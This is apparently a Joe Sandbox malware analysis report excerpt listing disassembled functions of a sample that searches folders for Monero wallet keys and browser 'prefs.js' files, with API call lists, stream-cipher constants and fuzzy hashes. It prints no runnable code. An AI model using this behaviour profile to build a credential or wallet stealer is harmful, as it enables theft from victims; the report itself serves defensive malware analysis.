                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 0cef91712425a6b9877f5e9369b8135be0d64e3b292e385837bdca58ee33a5e2
                              • Instruction ID: c538426ba31d750e38aff2b8387c0ef9579f9e4fa33454377533d996f58cb128
                              • Opcode Fuzzy Hash: 0cef91712425a6b9877f5e9369b8135be0d64e3b292e385837bdca58ee33a5e2
                              • Instruction Fuzzy Hash: DDA17472A102089BCB24DF64DC95FEA7379BB44301F04858FB60D96281DB78AB85CF5A
                              Function 004D4B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 004D4B7C
                              • FindFirstFileA.KERNEL32(?,?), ref: 004D4B93
                              • StrCmpCA.SHLWAPI(?,004E0FC4), ref: 004D4BC1
                              • StrCmpCA.SHLWAPI(?,004E0FC8), ref: 004D4BD7
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004D4DCD
                              • FindClose.KERNEL32(000000FF), ref: 004D4DE2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 3bab97331adb53480871b3401480602de6b58fad6786ecff031871a15df998e9
                              • Instruction ID: 3c674a0395c7b39e36eb9820348a24757720cef8452f68d72603446e63655b44
                              • Opcode Fuzzy Hash: 3bab97331adb53480871b3401480602de6b58fad6786ecff031871a15df998e9
                              • Instruction Fuzzy Hash: AD616B71510118ABCB24EBA0DC55FEA737CBB88705F00858FF60996151EB78EB85CF99
                              Function 004D47C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004D47D0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D47D7
                              • wsprintfA.USER32 ref: 004D47F6
                              • FindFirstFileA.KERNEL32(?,?), ref: 004D480D
                              • StrCmpCA.SHLWAPI(?,004E0FAC), ref: 004D483B
                              • StrCmpCA.SHLWAPI(?,004E0FB0), ref: 004D4851
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004D48DB
                              • FindClose.KERNEL32(000000FF), ref: 004D48F0
                              • lstrcat.KERNEL32(?,012AE7A8), ref: 004D4915
                              • lstrcat.KERNEL32(?,012ADC00), ref: 004D4928
                              • lstrlen.KERNEL32(?), ref: 004D4935
                              • lstrlen.KERNEL32(?), ref: 004D4946
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: be67f0b1d1fff4fff85ae492ee9ce89e3d5c8d786f2ba328b49e2a41ee0f0694
                              • Instruction ID: 632954da3eb8178411b6cbfa08e5f27f2882bdcb4b72670463d0ee5679d78e55
                              • Opcode Fuzzy Hash: be67f0b1d1fff4fff85ae492ee9ce89e3d5c8d786f2ba328b49e2a41ee0f0694
                              • Instruction Fuzzy Hash: 5851A8B5550208ABCB24EB70DC99FEE737CAB58300F00858FB64996150EB78DB85CF99
                              Function 004D40F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 004D4113
                              • FindFirstFileA.KERNEL32(?,?), ref: 004D412A
                              • StrCmpCA.SHLWAPI(?,004E0F94), ref: 004D4158
                              • StrCmpCA.SHLWAPI(?,004E0F98), ref: 004D416E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004D42BC
                              • FindClose.KERNEL32(000000FF), ref: 004D42D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 75674b0dc4bb19eab0417de65ca6f84632ab8ac116fe854aabda93d5dcc211c3
                              • Instruction ID: e60ec004e6c31e4b04ab6493f837b244cfc673104c134e057e005b2ecd1ce7c5
                              • Opcode Fuzzy Hash: 75674b0dc4bb19eab0417de65ca6f84632ab8ac116fe854aabda93d5dcc211c3
                              • Instruction Fuzzy Hash: 125164B1514118ABCB24EBB0DC95FEA737CBB48304F00868FB65996150DB78AB85CF58
                              Function 004CEE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 004CEE3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 004CEE55
                              • StrCmpCA.SHLWAPI(?,004E1630), ref: 004CEEAB
                              • StrCmpCA.SHLWAPI(?,004E1634), ref: 004CEEC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004CF3AE
                              • FindClose.KERNEL32(000000FF), ref: 004CF3C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: a574fea81d6b9a05c23c54b60754c05780d98679f5cabb3d529d2ed50d9b0c1b
                              • Instruction ID: 5be1ca03525de85cddfd9dc590da23ac6318d8859646c100127bae78dbb8e6c5
                              • Opcode Fuzzy Hash: a574fea81d6b9a05c23c54b60754c05780d98679f5cabb3d529d2ed50d9b0c1b
                              • Instruction Fuzzy Hash: EBE17F729111189BDB14FB61CC72EEE7379AF50304F0045DFB10A62292EE386B9ACF59
                              Function 00500098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                              • API String ID: 0-1562099544
                              • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                              • Instruction ID: 41c7afdd4ac702e8c6fa3cbb40fcb51a693891bfedce7e876f74b5a1eb2560f6
                              • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                              • Instruction Fuzzy Hash: 5EE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                              Function 004CF7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004E16B0,004E0D97), ref: 004CF81E
                              • StrCmpCA.SHLWAPI(?,004E16B4), ref: 004CF86F
                              • StrCmpCA.SHLWAPI(?,004E16B8), ref: 004CF885
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004CFBB1
                              • FindClose.KERNEL32(000000FF), ref: 004CFBC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: cd490cb18eecc3122bb07f4529e6dd0ab4f76dd2ae0367ad2e7e810dca879a74
                              • Instruction ID: 41278d9dfd3e9d8e15af931bee11e81a046909b41410bb11d5af9902758c1f5b
                              • Opcode Fuzzy Hash: cd490cb18eecc3122bb07f4529e6dd0ab4f76dd2ae0367ad2e7e810dca879a74
                              • Instruction Fuzzy Hash: 2FB195719101189BCB24FF61CCA6FEE7379AF44304F0085AFA50A57251EF386B59CB9A
                              Function 0091D0B5 Relevance: 15.4, Strings: 11, Instructions: 1664COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: w_$"8cF$5~]/$Cc)Q$E{[$R<#$bPe~$mJ>=$>b?$C_=$T?
                              • API String ID: 0-456953326
                              • Opcode ID: caebcb32a53543207288d2bfffb9a862fa308a7b38fcdbb4f7369208881bd15d
                              • Instruction ID: e3b697e21489845cfb0b4c33e1e3dd246958cabcae445400b69d1487c9e9ce0a
                              • Opcode Fuzzy Hash: caebcb32a53543207288d2bfffb9a862fa308a7b38fcdbb4f7369208881bd15d
                              • Instruction Fuzzy Hash: 49B246F3A0C3049FE304AE2DEC8567ABBE9EB94720F1A453DE6C5C3744E93598058687
                              Function 004C1710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004E523C,?,?,?,004E52E4,?,?,00000000,?,00000000), ref: 004C1963
                              • StrCmpCA.SHLWAPI(?,004E538C), ref: 004C19B3
                              • StrCmpCA.SHLWAPI(?,004E5434), ref: 004C19C9
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004C1D80
                              • DeleteFileA.KERNEL32(00000000), ref: 004C1E0A
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004C1E60
                              • FindClose.KERNEL32(000000FF), ref: 004C1E72
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 710124957ac4dfa0fd7e71e30b4feeaf9392d8bafb2d93db61933c13e6b7442d
                              • Instruction ID: 050b35f8ef0788556a05ad83a3312d03a2f0d12818f94133d9a97632fbf186bc
                              • Opcode Fuzzy Hash: 710124957ac4dfa0fd7e71e30b4feeaf9392d8bafb2d93db61933c13e6b7442d
                              • Instruction Fuzzy Hash: 7B123D719101189BCB19FB61CCB6EEE7379AF14304F4045DFA10A62291EF386B99CF69
                              Function 004CDF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,004E0C32), ref: 004CDF5E
                              • StrCmpCA.SHLWAPI(?,004E15C0), ref: 004CDFAE
                              • StrCmpCA.SHLWAPI(?,004E15C4), ref: 004CDFC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004CE4E0
                              • FindClose.KERNEL32(000000FF), ref: 004CE4F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
